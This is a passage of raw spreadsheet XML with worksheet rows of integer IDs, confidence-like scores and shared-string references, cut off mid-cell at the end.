      <c r="D7139">
        <v>4</v>
      </c>
      <c r="E7139">
        <v>0.67979997396469116</v>
      </c>
      <c r="F7139" t="s">
        <v>13461</v>
      </c>
      <c r="G7139" t="s">
        <v>14123</v>
      </c>
      <c r="H7139" t="s">
        <v>14124</v>
      </c>
    </row>
    <row r="7140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7140" s="1">
        <v>7138</v>
      </c>
      <c r="B7140">
        <v>1156</v>
      </c>
      <c r="C7140">
        <v>1156</v>
      </c>
      <c r="D7140">
        <v>4</v>
      </c>
      <c r="E7140">
        <v>0.70690000057220459</v>
      </c>
      <c r="F7140" t="s">
        <v>13461</v>
      </c>
      <c r="G7140" t="s">
        <v>14125</v>
      </c>
      <c r="H7140" t="s">
        <v>14126</v>
      </c>
    </row>
    <row r="7141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7141" s="1">
        <v>7139</v>
      </c>
      <c r="B7141">
        <v>1155</v>
      </c>
      <c r="C7141">
        <v>1155</v>
      </c>
      <c r="D7141">
        <v>4</v>
      </c>
      <c r="E7141">
        <v>0.99970000982284546</v>
      </c>
      <c r="F7141" t="s">
        <v>13461</v>
      </c>
      <c r="G7141" t="s">
        <v>14127</v>
      </c>
      <c r="H7141" t="s">
        <v>14128</v>
      </c>
    </row>
    <row r="7142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7142" s="1">
        <v>7140</v>
      </c>
      <c r="B7142">
        <v>7394</v>
      </c>
      <c r="C7142">
        <v>7394</v>
      </c>
      <c r="D7142">
        <v>4</v>
      </c>
      <c r="E7142">
        <v>0.73150002956390381</v>
      </c>
      <c r="F7142" t="s">
        <v>13461</v>
      </c>
      <c r="G7142" t="s">
        <v>14129</v>
      </c>
      <c r="H7142" t="s">
        <v>14130</v>
      </c>
    </row>
    <row r="7143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7143" s="1">
        <v>7141</v>
      </c>
      <c r="B7143">
        <v>312</v>
      </c>
      <c r="C7143">
        <v>312</v>
      </c>
      <c r="D7143">
        <v>4</v>
      </c>
      <c r="E7143">
        <v>0.6413000226020813</v>
      </c>
      <c r="F7143" t="s">
        <v>13461</v>
      </c>
      <c r="G7143" t="s">
        <v>14131</v>
      </c>
      <c r="H7143" t="s">
        <v>14132</v>
      </c>
    </row>
    <row r="7144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7144" s="1">
        <v>7142</v>
      </c>
      <c r="B7144">
        <v>7395</v>
      </c>
      <c r="C7144">
        <v>7395</v>
      </c>
      <c r="D7144">
        <v>4</v>
      </c>
      <c r="E7144">
        <v>0.75269997119903564</v>
      </c>
      <c r="F7144" t="s">
        <v>13461</v>
      </c>
      <c r="G7144" t="s">
        <v>14133</v>
      </c>
      <c r="H7144" t="s">
        <v>14134</v>
      </c>
    </row>
    <row r="7145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7145" s="1">
        <v>7143</v>
      </c>
      <c r="B7145">
        <v>1153</v>
      </c>
      <c r="C7145">
        <v>1153</v>
      </c>
      <c r="D7145">
        <v>4</v>
      </c>
      <c r="E7145">
        <v>0.98100000619888306</v>
      </c>
      <c r="F7145" t="s">
        <v>13461</v>
      </c>
      <c r="G7145" t="s">
        <v>14135</v>
      </c>
      <c r="H7145" t="s">
        <v>14136</v>
      </c>
    </row>
    <row r="7146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7146" s="1">
        <v>7144</v>
      </c>
      <c r="B7146">
        <v>1140</v>
      </c>
      <c r="C7146">
        <v>1140</v>
      </c>
      <c r="D7146">
        <v>4</v>
      </c>
      <c r="E7146">
        <v>0.98669999837875366</v>
      </c>
      <c r="F7146" t="s">
        <v>13461</v>
      </c>
      <c r="G7146" t="s">
        <v>14137</v>
      </c>
      <c r="H7146" t="s">
        <v>14138</v>
      </c>
    </row>
    <row r="7147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7147" s="1">
        <v>7145</v>
      </c>
      <c r="B7147">
        <v>1118</v>
      </c>
      <c r="C7147">
        <v>1118</v>
      </c>
      <c r="D7147">
        <v>4</v>
      </c>
      <c r="E7147">
        <v>0.45660001039504999</v>
      </c>
      <c r="F7147" t="s">
        <v>13461</v>
      </c>
      <c r="G7147" t="s">
        <v>14139</v>
      </c>
      <c r="H7147" t="s">
        <v>14140</v>
      </c>
    </row>
    <row r="7148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7148" s="1">
        <v>7146</v>
      </c>
      <c r="B7148">
        <v>7782</v>
      </c>
      <c r="C7148">
        <v>7782</v>
      </c>
      <c r="D7148">
        <v>4</v>
      </c>
      <c r="E7148">
        <v>0.99769997596740723</v>
      </c>
      <c r="F7148" t="s">
        <v>13461</v>
      </c>
      <c r="G7148" t="s">
        <v>14141</v>
      </c>
      <c r="H7148" t="s">
        <v>14142</v>
      </c>
    </row>
    <row r="7149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7149" s="1">
        <v>7147</v>
      </c>
      <c r="B7149">
        <v>7781</v>
      </c>
      <c r="C7149">
        <v>7781</v>
      </c>
      <c r="D7149">
        <v>4</v>
      </c>
      <c r="E7149">
        <v>0.99809998273849487</v>
      </c>
      <c r="F7149" t="s">
        <v>13461</v>
      </c>
      <c r="G7149" t="s">
        <v>14143</v>
      </c>
      <c r="H7149" t="s">
        <v>14144</v>
      </c>
    </row>
    <row r="7150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7150" s="1">
        <v>7148</v>
      </c>
      <c r="B7150">
        <v>7780</v>
      </c>
      <c r="C7150">
        <v>7780</v>
      </c>
      <c r="D7150">
        <v>4</v>
      </c>
      <c r="E7150">
        <v>0.76020002365112305</v>
      </c>
      <c r="F7150" t="s">
        <v>13461</v>
      </c>
      <c r="G7150" t="s">
        <v>14145</v>
      </c>
      <c r="H7150" t="s">
        <v>14146</v>
      </c>
    </row>
    <row r="7151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7151" s="1">
        <v>7149</v>
      </c>
      <c r="B7151">
        <v>323</v>
      </c>
      <c r="C7151">
        <v>323</v>
      </c>
      <c r="D7151">
        <v>4</v>
      </c>
      <c r="E7151">
        <v>0.50959998369216919</v>
      </c>
      <c r="F7151" t="s">
        <v>13461</v>
      </c>
      <c r="G7151" t="s">
        <v>14147</v>
      </c>
      <c r="H7151" t="s">
        <v>14148</v>
      </c>
    </row>
    <row r="7152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7152" s="1">
        <v>7150</v>
      </c>
      <c r="B7152">
        <v>1116</v>
      </c>
      <c r="C7152">
        <v>1116</v>
      </c>
      <c r="D7152">
        <v>4</v>
      </c>
      <c r="E7152">
        <v>0.3635999858379364</v>
      </c>
      <c r="F7152" t="s">
        <v>13461</v>
      </c>
      <c r="G7152" t="s">
        <v>14149</v>
      </c>
      <c r="H7152" t="s">
        <v>14150</v>
      </c>
    </row>
    <row r="7153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7153" s="1">
        <v>7151</v>
      </c>
      <c r="B7153">
        <v>1114</v>
      </c>
      <c r="C7153">
        <v>1114</v>
      </c>
      <c r="D7153">
        <v>4</v>
      </c>
      <c r="E7153">
        <v>0.62440001964569092</v>
      </c>
      <c r="F7153" t="s">
        <v>13461</v>
      </c>
      <c r="G7153" t="s">
        <v>14151</v>
      </c>
      <c r="H7153" t="s">
        <v>14152</v>
      </c>
    </row>
    <row r="7154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7154" s="1">
        <v>7152</v>
      </c>
      <c r="B7154">
        <v>1095</v>
      </c>
      <c r="C7154">
        <v>1095</v>
      </c>
      <c r="D7154">
        <v>4</v>
      </c>
      <c r="E7154">
        <v>0.99639999866485596</v>
      </c>
      <c r="F7154" t="s">
        <v>13461</v>
      </c>
      <c r="G7154" t="s">
        <v>14153</v>
      </c>
      <c r="H7154" t="s">
        <v>14154</v>
      </c>
    </row>
    <row r="7155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7155" s="1">
        <v>7153</v>
      </c>
      <c r="B7155">
        <v>332</v>
      </c>
      <c r="C7155">
        <v>332</v>
      </c>
      <c r="D7155">
        <v>4</v>
      </c>
      <c r="E7155">
        <v>0.73100000619888306</v>
      </c>
      <c r="F7155" t="s">
        <v>13461</v>
      </c>
      <c r="G7155" t="s">
        <v>14155</v>
      </c>
      <c r="H7155" t="s">
        <v>14156</v>
      </c>
    </row>
    <row r="7156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7156" s="1">
        <v>7154</v>
      </c>
      <c r="B7156">
        <v>334</v>
      </c>
      <c r="C7156">
        <v>334</v>
      </c>
      <c r="D7156">
        <v>4</v>
      </c>
      <c r="E7156">
        <v>0.52689999341964722</v>
      </c>
      <c r="F7156" t="s">
        <v>13461</v>
      </c>
      <c r="G7156" t="s">
        <v>14157</v>
      </c>
      <c r="H7156" t="s">
        <v>14158</v>
      </c>
    </row>
    <row r="7157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7157" s="1">
        <v>7155</v>
      </c>
      <c r="B7157">
        <v>335</v>
      </c>
      <c r="C7157">
        <v>335</v>
      </c>
      <c r="D7157">
        <v>4</v>
      </c>
      <c r="E7157">
        <v>0.58890002965927124</v>
      </c>
      <c r="F7157" t="s">
        <v>13461</v>
      </c>
      <c r="G7157" t="s">
        <v>14159</v>
      </c>
      <c r="H7157" t="s">
        <v>14160</v>
      </c>
    </row>
    <row r="7158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7158" s="1">
        <v>7156</v>
      </c>
      <c r="B7158">
        <v>336</v>
      </c>
      <c r="C7158">
        <v>336</v>
      </c>
      <c r="D7158">
        <v>4</v>
      </c>
      <c r="E7158">
        <v>0.99900001287460327</v>
      </c>
      <c r="F7158" t="s">
        <v>13461</v>
      </c>
      <c r="G7158" t="s">
        <v>14161</v>
      </c>
      <c r="H7158" t="s">
        <v>14162</v>
      </c>
    </row>
    <row r="7159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7159" s="1">
        <v>7157</v>
      </c>
      <c r="B7159">
        <v>1091</v>
      </c>
      <c r="C7159">
        <v>1091</v>
      </c>
      <c r="D7159">
        <v>4</v>
      </c>
      <c r="E7159">
        <v>0.92409998178482056</v>
      </c>
      <c r="F7159" t="s">
        <v>13461</v>
      </c>
      <c r="G7159" t="s">
        <v>14163</v>
      </c>
      <c r="H7159" t="s">
        <v>14164</v>
      </c>
    </row>
    <row r="7160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7160" s="1">
        <v>7158</v>
      </c>
      <c r="B7160">
        <v>7768</v>
      </c>
      <c r="C7160">
        <v>7768</v>
      </c>
      <c r="D7160">
        <v>4</v>
      </c>
      <c r="E7160">
        <v>0.58910000324249268</v>
      </c>
      <c r="F7160" t="s">
        <v>13461</v>
      </c>
      <c r="G7160" t="s">
        <v>14165</v>
      </c>
      <c r="H7160" t="s">
        <v>14166</v>
      </c>
    </row>
    <row r="7161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7161" s="1">
        <v>7159</v>
      </c>
      <c r="B7161">
        <v>1088</v>
      </c>
      <c r="C7161">
        <v>1088</v>
      </c>
      <c r="D7161">
        <v>4</v>
      </c>
      <c r="E7161">
        <v>0.41789999604225159</v>
      </c>
      <c r="F7161" t="s">
        <v>13461</v>
      </c>
      <c r="G7161" t="s">
        <v>14167</v>
      </c>
      <c r="H7161" t="s">
        <v>14168</v>
      </c>
    </row>
    <row r="7162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7162" s="1">
        <v>7160</v>
      </c>
      <c r="B7162">
        <v>7417</v>
      </c>
      <c r="C7162">
        <v>7417</v>
      </c>
      <c r="D7162">
        <v>4</v>
      </c>
      <c r="E7162">
        <v>0.83950001001358032</v>
      </c>
      <c r="F7162" t="s">
        <v>13461</v>
      </c>
      <c r="G7162" t="s">
        <v>14169</v>
      </c>
      <c r="H7162" t="s">
        <v>14170</v>
      </c>
    </row>
    <row r="7163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7163" s="1">
        <v>7161</v>
      </c>
      <c r="B7163">
        <v>343</v>
      </c>
      <c r="C7163">
        <v>343</v>
      </c>
      <c r="D7163">
        <v>4</v>
      </c>
      <c r="E7163">
        <v>0.69040000438690186</v>
      </c>
      <c r="F7163" t="s">
        <v>13461</v>
      </c>
      <c r="G7163" t="s">
        <v>14171</v>
      </c>
      <c r="H7163" t="s">
        <v>14172</v>
      </c>
    </row>
    <row r="7164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7164" s="1">
        <v>7162</v>
      </c>
      <c r="B7164">
        <v>1142</v>
      </c>
      <c r="C7164">
        <v>1142</v>
      </c>
      <c r="D7164">
        <v>4</v>
      </c>
      <c r="E7164">
        <v>0.43470001220703119</v>
      </c>
      <c r="F7164" t="s">
        <v>13461</v>
      </c>
      <c r="G7164" t="s">
        <v>14173</v>
      </c>
      <c r="H7164" t="s">
        <v>14174</v>
      </c>
    </row>
    <row r="7165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7165" s="1">
        <v>7163</v>
      </c>
      <c r="B7165">
        <v>5566</v>
      </c>
      <c r="C7165">
        <v>5566</v>
      </c>
      <c r="D7165">
        <v>4</v>
      </c>
      <c r="E7165">
        <v>0.55339998006820679</v>
      </c>
      <c r="F7165" t="s">
        <v>13461</v>
      </c>
      <c r="G7165" t="s">
        <v>14175</v>
      </c>
      <c r="H7165" t="s">
        <v>14176</v>
      </c>
    </row>
    <row r="7166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7166" s="1">
        <v>7164</v>
      </c>
      <c r="B7166">
        <v>7160</v>
      </c>
      <c r="C7166">
        <v>7160</v>
      </c>
      <c r="D7166">
        <v>4</v>
      </c>
      <c r="E7166">
        <v>0.6624000072479248</v>
      </c>
      <c r="F7166" t="s">
        <v>13461</v>
      </c>
      <c r="G7166" t="s">
        <v>14177</v>
      </c>
      <c r="H7166" t="s">
        <v>14178</v>
      </c>
    </row>
    <row r="7167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7167" s="1">
        <v>7165</v>
      </c>
      <c r="B7167">
        <v>4247</v>
      </c>
      <c r="C7167">
        <v>4247</v>
      </c>
      <c r="D7167">
        <v>4</v>
      </c>
      <c r="E7167">
        <v>0.86760002374649048</v>
      </c>
      <c r="F7167" t="s">
        <v>13461</v>
      </c>
      <c r="G7167" t="s">
        <v>14179</v>
      </c>
      <c r="H7167" t="s">
        <v>14180</v>
      </c>
    </row>
    <row r="7168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7168" s="1">
        <v>7166</v>
      </c>
      <c r="B7168">
        <v>4253</v>
      </c>
      <c r="C7168">
        <v>4253</v>
      </c>
      <c r="D7168">
        <v>4</v>
      </c>
      <c r="E7168">
        <v>0.99959999322891235</v>
      </c>
      <c r="F7168" t="s">
        <v>13461</v>
      </c>
      <c r="G7168" t="s">
        <v>14181</v>
      </c>
      <c r="H7168" t="s">
        <v>14182</v>
      </c>
    </row>
    <row r="7169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7169" s="1">
        <v>7167</v>
      </c>
      <c r="B7169">
        <v>4257</v>
      </c>
      <c r="C7169">
        <v>4257</v>
      </c>
      <c r="D7169">
        <v>4</v>
      </c>
      <c r="E7169">
        <v>0.95010000467300415</v>
      </c>
      <c r="F7169" t="s">
        <v>13461</v>
      </c>
      <c r="G7169" t="s">
        <v>14183</v>
      </c>
      <c r="H7169" t="s">
        <v>14184</v>
      </c>
    </row>
    <row r="7170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7170" s="1">
        <v>7168</v>
      </c>
      <c r="B7170">
        <v>4258</v>
      </c>
      <c r="C7170">
        <v>4258</v>
      </c>
      <c r="D7170">
        <v>4</v>
      </c>
      <c r="E7170">
        <v>0.75400000810623169</v>
      </c>
      <c r="F7170" t="s">
        <v>13461</v>
      </c>
      <c r="G7170" t="s">
        <v>14185</v>
      </c>
      <c r="H7170" t="s">
        <v>14186</v>
      </c>
    </row>
    <row r="7171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7171" s="1">
        <v>7169</v>
      </c>
      <c r="B7171">
        <v>4261</v>
      </c>
      <c r="C7171">
        <v>4261</v>
      </c>
      <c r="D7171">
        <v>4</v>
      </c>
      <c r="E7171">
        <v>0.75279998779296875</v>
      </c>
      <c r="F7171" t="s">
        <v>13461</v>
      </c>
      <c r="G7171" t="s">
        <v>14187</v>
      </c>
      <c r="H7171" t="s">
        <v>14188</v>
      </c>
    </row>
    <row r="7172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7172" s="1">
        <v>7170</v>
      </c>
      <c r="B7172">
        <v>4263</v>
      </c>
      <c r="C7172">
        <v>4263</v>
      </c>
      <c r="D7172">
        <v>4</v>
      </c>
      <c r="E7172">
        <v>0.99910002946853638</v>
      </c>
      <c r="F7172" t="s">
        <v>13461</v>
      </c>
      <c r="G7172" t="s">
        <v>14189</v>
      </c>
      <c r="H7172" t="s">
        <v>14190</v>
      </c>
    </row>
    <row r="7173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7173" s="1">
        <v>7171</v>
      </c>
      <c r="B7173">
        <v>4267</v>
      </c>
      <c r="C7173">
        <v>4267</v>
      </c>
      <c r="D7173">
        <v>4</v>
      </c>
      <c r="E7173">
        <v>0.9976000189781189</v>
      </c>
      <c r="F7173" t="s">
        <v>13461</v>
      </c>
      <c r="G7173" t="s">
        <v>14191</v>
      </c>
      <c r="H7173" t="s">
        <v>14192</v>
      </c>
    </row>
    <row r="7174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7174" s="1">
        <v>7172</v>
      </c>
      <c r="B7174">
        <v>4268</v>
      </c>
      <c r="C7174">
        <v>4268</v>
      </c>
      <c r="D7174">
        <v>4</v>
      </c>
      <c r="E7174">
        <v>0.99730002880096436</v>
      </c>
      <c r="F7174" t="s">
        <v>13461</v>
      </c>
      <c r="G7174" t="s">
        <v>14193</v>
      </c>
      <c r="H7174" t="s">
        <v>14194</v>
      </c>
    </row>
    <row r="7175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7175" s="1">
        <v>7173</v>
      </c>
      <c r="B7175">
        <v>6120</v>
      </c>
      <c r="C7175">
        <v>6120</v>
      </c>
      <c r="D7175">
        <v>4</v>
      </c>
      <c r="E7175">
        <v>0.99550002813339233</v>
      </c>
      <c r="F7175" t="s">
        <v>13461</v>
      </c>
      <c r="G7175" t="s">
        <v>14195</v>
      </c>
      <c r="H7175" t="s">
        <v>14196</v>
      </c>
    </row>
    <row r="7176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7176" s="1">
        <v>7174</v>
      </c>
      <c r="B7176">
        <v>6139</v>
      </c>
      <c r="C7176">
        <v>6139</v>
      </c>
      <c r="D7176">
        <v>4</v>
      </c>
      <c r="E7176">
        <v>0.56590002775192261</v>
      </c>
      <c r="F7176" t="s">
        <v>13461</v>
      </c>
      <c r="G7176" t="s">
        <v>14197</v>
      </c>
      <c r="H7176" t="s">
        <v>14198</v>
      </c>
    </row>
    <row r="7177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7177" s="1">
        <v>7175</v>
      </c>
      <c r="B7177">
        <v>4270</v>
      </c>
      <c r="C7177">
        <v>4270</v>
      </c>
      <c r="D7177">
        <v>4</v>
      </c>
      <c r="E7177">
        <v>0.89249998331069946</v>
      </c>
      <c r="F7177" t="s">
        <v>13461</v>
      </c>
      <c r="G7177" t="s">
        <v>14199</v>
      </c>
      <c r="H7177" t="s">
        <v>14200</v>
      </c>
    </row>
    <row r="7178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7178" s="1">
        <v>7176</v>
      </c>
      <c r="B7178">
        <v>6116</v>
      </c>
      <c r="C7178">
        <v>6116</v>
      </c>
      <c r="D7178">
        <v>4</v>
      </c>
      <c r="E7178">
        <v>0.9715999960899353</v>
      </c>
      <c r="F7178" t="s">
        <v>13461</v>
      </c>
      <c r="G7178" t="s">
        <v>14201</v>
      </c>
      <c r="H7178" t="s">
        <v>14202</v>
      </c>
    </row>
    <row r="7179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7179" s="1">
        <v>7177</v>
      </c>
      <c r="B7179">
        <v>6114</v>
      </c>
      <c r="C7179">
        <v>6114</v>
      </c>
      <c r="D7179">
        <v>4</v>
      </c>
      <c r="E7179">
        <v>0.57580000162124634</v>
      </c>
      <c r="F7179" t="s">
        <v>13461</v>
      </c>
      <c r="G7179" t="s">
        <v>14203</v>
      </c>
      <c r="H7179" t="s">
        <v>14204</v>
      </c>
    </row>
    <row r="7180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7180" s="1">
        <v>7178</v>
      </c>
      <c r="B7180">
        <v>6113</v>
      </c>
      <c r="C7180">
        <v>6113</v>
      </c>
      <c r="D7180">
        <v>4</v>
      </c>
      <c r="E7180">
        <v>0.97310000658035278</v>
      </c>
      <c r="F7180" t="s">
        <v>13461</v>
      </c>
      <c r="G7180" t="s">
        <v>14205</v>
      </c>
      <c r="H7180" t="s">
        <v>14206</v>
      </c>
    </row>
    <row r="7181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7181" s="1">
        <v>7179</v>
      </c>
      <c r="B7181">
        <v>4287</v>
      </c>
      <c r="C7181">
        <v>4287</v>
      </c>
      <c r="D7181">
        <v>4</v>
      </c>
      <c r="E7181">
        <v>0.60170000791549683</v>
      </c>
      <c r="F7181" t="s">
        <v>13461</v>
      </c>
      <c r="G7181" t="s">
        <v>14207</v>
      </c>
      <c r="H7181" t="s">
        <v>14208</v>
      </c>
    </row>
    <row r="7182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7182" s="1">
        <v>7180</v>
      </c>
      <c r="B7182">
        <v>4298</v>
      </c>
      <c r="C7182">
        <v>4298</v>
      </c>
      <c r="D7182">
        <v>4</v>
      </c>
      <c r="E7182">
        <v>0.60409998893737793</v>
      </c>
      <c r="F7182" t="s">
        <v>13461</v>
      </c>
      <c r="G7182" t="s">
        <v>14209</v>
      </c>
      <c r="H7182" t="s">
        <v>14210</v>
      </c>
    </row>
    <row r="7183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7183" s="1">
        <v>7181</v>
      </c>
      <c r="B7183">
        <v>4305</v>
      </c>
      <c r="C7183">
        <v>4305</v>
      </c>
      <c r="D7183">
        <v>4</v>
      </c>
      <c r="E7183">
        <v>0.57920002937316895</v>
      </c>
      <c r="F7183" t="s">
        <v>13461</v>
      </c>
      <c r="G7183" t="s">
        <v>14211</v>
      </c>
      <c r="H7183" t="s">
        <v>14212</v>
      </c>
    </row>
    <row r="7184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7184" s="1">
        <v>7182</v>
      </c>
      <c r="B7184">
        <v>6101</v>
      </c>
      <c r="C7184">
        <v>6101</v>
      </c>
      <c r="D7184">
        <v>4</v>
      </c>
      <c r="E7184">
        <v>0.38780000805854797</v>
      </c>
      <c r="F7184" t="s">
        <v>13461</v>
      </c>
      <c r="G7184" t="s">
        <v>14213</v>
      </c>
      <c r="H7184" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="7185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7185" s="1">
        <v>7183</v>
      </c>
      <c r="B7185">
        <v>6100</v>
      </c>
      <c r="C7185">
        <v>6100</v>
      </c>
      <c r="D7185">
        <v>4</v>
      </c>
      <c r="E7185">
        <v>0.571399986743927</v>
      </c>
      <c r="F7185" t="s">
        <v>13461</v>
      </c>
      <c r="G7185" t="s">
        <v>14215</v>
      </c>
      <c r="H7185" t="s">
        <v>14216</v>
      </c>
    </row>
    <row r="7186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7186" s="1">
        <v>7184</v>
      </c>
      <c r="B7186">
        <v>4309</v>
      </c>
      <c r="C7186">
        <v>4309</v>
      </c>
      <c r="D7186">
        <v>4</v>
      </c>
      <c r="E7186">
        <v>0.94700002670288086</v>
      </c>
      <c r="F7186" t="s">
        <v>13461</v>
      </c>
      <c r="G7186" t="s">
        <v>14217</v>
      </c>
      <c r="H7186" t="s">
        <v>14218</v>
      </c>
    </row>
    <row r="7187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7187" s="1">
        <v>7185</v>
      </c>
      <c r="B7187">
        <v>6117</v>
      </c>
      <c r="C7187">
        <v>6117</v>
      </c>
      <c r="D7187">
        <v>4</v>
      </c>
      <c r="E7187">
        <v>0.97409999370574951</v>
      </c>
      <c r="F7187" t="s">
        <v>13461</v>
      </c>
      <c r="G7187" t="s">
        <v>14219</v>
      </c>
      <c r="H7187" t="s">
        <v>14220</v>
      </c>
    </row>
    <row r="7188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7188" s="1">
        <v>7186</v>
      </c>
      <c r="B7188">
        <v>4310</v>
      </c>
      <c r="C7188">
        <v>4310</v>
      </c>
      <c r="D7188">
        <v>4</v>
      </c>
      <c r="E7188">
        <v>0.72380000352859497</v>
      </c>
      <c r="F7188" t="s">
        <v>13461</v>
      </c>
      <c r="G7188" t="s">
        <v>14221</v>
      </c>
      <c r="H7188" t="s">
        <v>14222</v>
      </c>
    </row>
    <row r="7189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7189" s="1">
        <v>7187</v>
      </c>
      <c r="B7189">
        <v>4236</v>
      </c>
      <c r="C7189">
        <v>4236</v>
      </c>
      <c r="D7189">
        <v>4</v>
      </c>
      <c r="E7189">
        <v>0.67760002613067627</v>
      </c>
      <c r="F7189" t="s">
        <v>13461</v>
      </c>
      <c r="G7189" t="s">
        <v>14223</v>
      </c>
      <c r="H7189" t="s">
        <v>14224</v>
      </c>
    </row>
    <row r="7190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7190" s="1">
        <v>7188</v>
      </c>
      <c r="B7190">
        <v>6149</v>
      </c>
      <c r="C7190">
        <v>6149</v>
      </c>
      <c r="D7190">
        <v>4</v>
      </c>
      <c r="E7190">
        <v>0.7192000150680542</v>
      </c>
      <c r="F7190" t="s">
        <v>13461</v>
      </c>
      <c r="G7190" t="s">
        <v>14225</v>
      </c>
      <c r="H7190" t="s">
        <v>14226</v>
      </c>
    </row>
    <row r="7191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7191" s="1">
        <v>7189</v>
      </c>
      <c r="B7191">
        <v>4093</v>
      </c>
      <c r="C7191">
        <v>4093</v>
      </c>
      <c r="D7191">
        <v>4</v>
      </c>
      <c r="E7191">
        <v>0.99479997158050537</v>
      </c>
      <c r="F7191" t="s">
        <v>13461</v>
      </c>
      <c r="G7191" t="s">
        <v>14227</v>
      </c>
      <c r="H7191" t="s">
        <v>14228</v>
      </c>
    </row>
    <row r="7192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7192" s="1">
        <v>7190</v>
      </c>
      <c r="B7192">
        <v>6194</v>
      </c>
      <c r="C7192">
        <v>6194</v>
      </c>
      <c r="D7192">
        <v>4</v>
      </c>
      <c r="E7192">
        <v>0.99650001525878906</v>
      </c>
      <c r="F7192" t="s">
        <v>13461</v>
      </c>
      <c r="G7192" t="s">
        <v>14229</v>
      </c>
      <c r="H7192" t="s">
        <v>14230</v>
      </c>
    </row>
    <row r="7193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7193" s="1">
        <v>7191</v>
      </c>
      <c r="B7193">
        <v>6193</v>
      </c>
      <c r="C7193">
        <v>6193</v>
      </c>
      <c r="D7193">
        <v>4</v>
      </c>
      <c r="E7193">
        <v>0.99089998006820679</v>
      </c>
      <c r="F7193" t="s">
        <v>13461</v>
      </c>
      <c r="G7193" t="s">
        <v>14231</v>
      </c>
      <c r="H7193" t="s">
        <v>14232</v>
      </c>
    </row>
    <row r="7194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7194" s="1">
        <v>7192</v>
      </c>
      <c r="B7194">
        <v>4110</v>
      </c>
      <c r="C7194">
        <v>4110</v>
      </c>
      <c r="D7194">
        <v>4</v>
      </c>
      <c r="E7194">
        <v>0.50440001487731934</v>
      </c>
      <c r="F7194" t="s">
        <v>13461</v>
      </c>
      <c r="G7194" t="s">
        <v>14233</v>
      </c>
      <c r="H7194" t="s">
        <v>14234</v>
      </c>
    </row>
    <row r="7195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7195" s="1">
        <v>7193</v>
      </c>
      <c r="B7195">
        <v>6180</v>
      </c>
      <c r="C7195">
        <v>6180</v>
      </c>
      <c r="D7195">
        <v>4</v>
      </c>
      <c r="E7195">
        <v>0.99720001220703125</v>
      </c>
      <c r="F7195" t="s">
        <v>13461</v>
      </c>
      <c r="G7195" t="s">
        <v>14235</v>
      </c>
      <c r="H7195" t="s">
        <v>14236</v>
      </c>
    </row>
    <row r="7196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7196" s="1">
        <v>7194</v>
      </c>
      <c r="B7196">
        <v>4157</v>
      </c>
      <c r="C7196">
        <v>4157</v>
      </c>
      <c r="D7196">
        <v>4</v>
      </c>
      <c r="E7196">
        <v>0.99910002946853638</v>
      </c>
      <c r="F7196" t="s">
        <v>13461</v>
      </c>
      <c r="G7196" t="s">
        <v>14237</v>
      </c>
      <c r="H7196" t="s">
        <v>14238</v>
      </c>
    </row>
    <row r="7197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7197" s="1">
        <v>7195</v>
      </c>
      <c r="B7197">
        <v>4158</v>
      </c>
      <c r="C7197">
        <v>4158</v>
      </c>
      <c r="D7197">
        <v>4</v>
      </c>
      <c r="E7197">
        <v>0.84249997138977051</v>
      </c>
      <c r="F7197" t="s">
        <v>13461</v>
      </c>
      <c r="G7197" t="s">
        <v>14239</v>
